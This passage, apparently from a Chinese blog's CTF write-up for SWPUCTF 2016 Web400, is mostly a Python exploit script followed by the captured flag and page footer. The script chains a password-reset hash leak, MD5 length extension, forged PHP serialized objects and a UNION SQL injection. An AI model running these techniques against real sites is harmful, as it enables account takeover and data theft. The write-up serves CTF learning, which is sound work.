class="comment"># userid=b64decode(unquote(a.cookies.get(&#x27;user&#x27;)).encode()).find(username.encode())</span></span><br><span class="line">    print(userid.decode())</span><br><span class="line">    <span class="keyword">return</span> int(userid.decode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_admin_md5</span>() -&gt; int:</span></span><br><span class="line">    a = requests.post(addr + <span class="string">&quot;forget.php&quot;</span>, data=&#123;</span><br><span class="line">        <span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin&quot;</span>,</span><br><span class="line">        <span class="string">&quot;mibao&quot;</span>: <span class="string">&quot;mibao&quot;</span>,</span><br><span class="line">        <span class="string">&quot;pass&quot;</span>: <span class="string">&quot;3werwer&quot;</span>,</span><br><span class="line">        <span class="string">&quot;forget&quot;</span>: <span class="string">&quot;1&quot;</span></span><br><span class="line">    &#125;, allow_redirects=<span class="literal">False</span>)</span><br><span class="line">    md5 = b64decode(parse_qs(a.headers[<span class="string">&#x27;Location&#x27;</span>])[<span class="string">&#x27;check&#x27;</span>][<span class="number">0</span>])</span><br><span class="line">    print(md5.decode())</span><br><span class="line">    <span class="keyword">return</span> md5.decode()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_fake_md5</span>(<span class="params">md5: str</span>) -&gt; dict:</span></span><br><span class="line">    result = subprocess.getoutput(<span class="string">&quot;python2 md5pad.py &#123;0&#125; admin 16&quot;</span>.format(md5))</span><br><span class="line">    print(result)</span><br><span class="line">    final = dict()</span><br><span class="line">    payload = result.splitlines()[<span class="number">0</span>]</span><br><span class="line">    final[<span class="string">&#x27;payload&#x27;</span>] = payload[<span class="number">11</span>:<span class="number">-6</span>]</span><br><span class="line">    final[<span class="string">&#x27;md5&#x27;</span>] = result.splitlines()[<span class="number">2</span>][<span class="number">5</span>:]</span><br><span class="line">    print(final)</span><br><span class="line">    <span class="keyword">return</span> final</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">send_api</span>(<span class="params">result: dict, userid: int</span>):</span></span><br><span class="line">    php_content = <span class="string">r&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">class admin</span></span><br><span class="line"><span class="string">&#123;</span></span><br><span class="line"><span class="string">    var $name = &quot;admin&quot;;</span></span><br><span class="line"><span class="string">    var $check = &quot;%s&quot;;</span></span><br><span class="line"><span class="string">    var $data = &quot;%s&quot;;</span></span><br><span class="line"><span class="string">    var $method = &quot;del_user&quot;;</span></span><br><span class="line"><span class="string">    var $userid = %d;</span></span><br><span class="line"><span class="string">    var $msgid;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">$a = serialize(new admin());</span></span><br><span class="line"><span class="string">echo base64_encode($a);&#x27;&#x27;&#x27;</span>%(result[<span class="string">&#x27;md5&#x27;</span>], result[<span class="string">&#x27;payload&#x27;</span>], userid)</span><br><span class="line">    file = open(<span class="string">&quot;tmp.php&quot;</span>, <span class="string">&#x27;w&#x27;</span>)</span><br><span class="line">    file.write(php_content)</span><br><span class="line">    payload = subprocess.getoutput(<span class="string">&quot;php -r &#x27;&#123;0&#125;&#x27;&quot;</span>.format(php_content))</span><br><span class="line">    print(payload)</span><br><span class="line"></span><br><span class="line">    a = requests.get(addr + <span class="string">&quot;api.php&quot;</span>, params=&#123;</span><br><span class="line">        <span class="string">&quot;api&quot;</span>: payload</span><br><span class="line">    &#125;)</span><br><span class="line">    print(a.text)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sql_inj</span>(<span class="params">a: requests.Session</span>):</span></span><br><span class="line">    b = a.get(addr + <span class="string">&quot;riji.php&quot;</span>, params=&#123;</span><br><span class="line">        <span class="string">&quot;id&quot;</span>: <span class="string">&quot;-1 union select 1,2,flag from flag&quot;</span></span><br><span class="line">    &#125;)</span><br><span class="line">    print(b.text)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    username = register(a)</span><br><span class="line">    userid = login(a, username)</span><br><span class="line">    admin_md5 = get_admin_md5()</span><br><span class="line">    result=get_fake_md5(admin_md5)</span><br><span class="line">    send_api(result,userid)</span><br><span class="line">    sql_inj(a)</span><br></pre></td></tr></table></figure></p>

    <div id="aplayer-kfyHcORt" class="aplayer aplayer-tag-marker meting-tag-marker"
         data-id="479408220" data-server="netease" data-type="song" data-mode="circulation" data-autoplay="true" data-mutex="true" data-listmaxheight="340px" data-preload="auto" data-theme="#ad7a86" data-loop="all"
    ></div>
<p>flag{0aa97a23-a64f-415c-a75e-40b7ce271d38}</p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>Tiaonmmn.ZMZ
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://tiaonmmn.github.io/2019/09/13/SWPUCTF-2016-Web400/" title="SWPUCTF-2016-Web400">http://tiaonmmn.github.io/2019/09/13/SWPUCTF-2016-Web400/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nd/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-ND</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/Unserialize/" rel="tag"><i class="fa fa-tag"></i> Unserialize</a>
              <a href="/tags/PHP/" rel="tag"><i class="fa fa-tag"></i> PHP</a>
              <a href="/tags/Web/" rel="tag"><i class="fa fa-tag"></i> Web</a>
              <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag"><i class="fa fa-tag"></i> SQL注入</a>
              <a href="/tags/%E5%93%88%E5%B8%8C%E6%89%A9%E5%B1%95%E6%94%BB%E5%87%BB/" rel="tag"><i class="fa fa-tag"></i> 哈希扩展攻击</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2019/09/12/HarekazeCTF2019-A-Z/" rel="prev" title="HarekazeCTF2019-A_Z">
                  <i class="fa fa-chevron-left"></i> HarekazeCTF2019-A_Z
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2019/09/17/CSAW-Quals-2019-Unagi/" rel="next" title="CSAW Quals 2019 Unagi">
                  CSAW Quals 2019 Unagi <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
  
  
  



      
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

    </div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
      

      

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">flag{Lorem_ipsum}</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">342k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">5:11</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script size="300" alpha="0.6" zIndex="-1" src="//cdn.jsdelivr.net/npm/ribbon.js@1.0.2/dist/ribbon.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.0/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script><script src="/js/bookmark.js"></script>

  




  <script src="/js/local-search.js"></script>








<script>
document.querySelectorAll('.pdfobject-container').forEach(element => {
  const url = element.dataset.target;
  const pdfOpenParams = {
    navpanes : 0,
    toolbar  : 0,
    statusbar: 0,
    pagemode : 'thumbs',
    view     : 'FitH'
  };
  const pdfOpenFragment = '#' + Object.entries(pdfOpenParams).map(([key, value]) => `${key}=${encodeURIComponent(value)}`).join('&');
  const fullURL = `/lib/pdf/web/viewer.html?file=${encodeURIComponent(url)}${pdfOpenFragment}`;

  if (NexT.utils.supportsPDFs()) {
    element.innerHTML = `<embed class="pdfobject" src="${url + pdfOpenFragment}" type="application/pdf" style="height: ${element.dataset.height};">`;
  } else {
    element.innerHTML = `<iframe src="${fullURL}" style="height: ${element.dataset.height};" frameborder="0"></iframe>`;
  }
});
</script>


<script>
if (document.querySelectorAll('.mermaid').length) {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/mermaid@8.7.0/dist/mermaid.min.js', () => {
    mermaid.init({
      theme    : 'forest',
      logLevel : 3,
      flowchart: { curve     : 'linear' },
      gantt    : { axisFormat: '%m/%d/%Y' },
      sequence : { actorMargin: 50 }
    }, '.mermaid');
  }, window.mermaid);
}
</script>


  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>








  

  

  
<!-- calendar widget -->

    <script src=""></script>
    <script src=""></script>
    <script>
    $(function() {
        $('#CloudCalendar').aCalendar('zh-CN',
            $.extend(
                '', {
                    single:true,
                    root:'/calendar/'
                }
            )
        );
    });
    </script>

<script>
NexT.utils.loadComments('#valine-comments', () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', () => {
    new Valine(Object.assign({
      el  : '#valine-comments',
      path: "/2019/09/13/SWPUCTF-2016-Web400/",
    }, {"enable":true,"appId":"rGe4J3rLO75By3sjYfktvsyD-MdYXbMMI","appKey":"bpXDIRUBmowvz9tnMhIj6zs7","placeholder":"Just go go","avatar":"mm","meta":["nick","mail","link"],"pageSize":10,"lang":"zh-cn","visitor":false,"comment_count":true,"recordIP":true,"serverURLs":null,"enableQQ":true,"requiredFields":[]}
    ));
  }, window.Valine);
});
</script>

    
    <script src="/lib/calendar/calendar.min.js"></script>
    <script src="/lib/calendar/languages.min.js"></script>
    <script type="text/javascript">
    $(function() {
        $('#CloudCalendar').aCalendar('zh-CN',
            $.extend(
                '', {
                    single:true,
                    root:'/calendar/'
                }
            )
        );
    });
    </script>

</body>
</html>


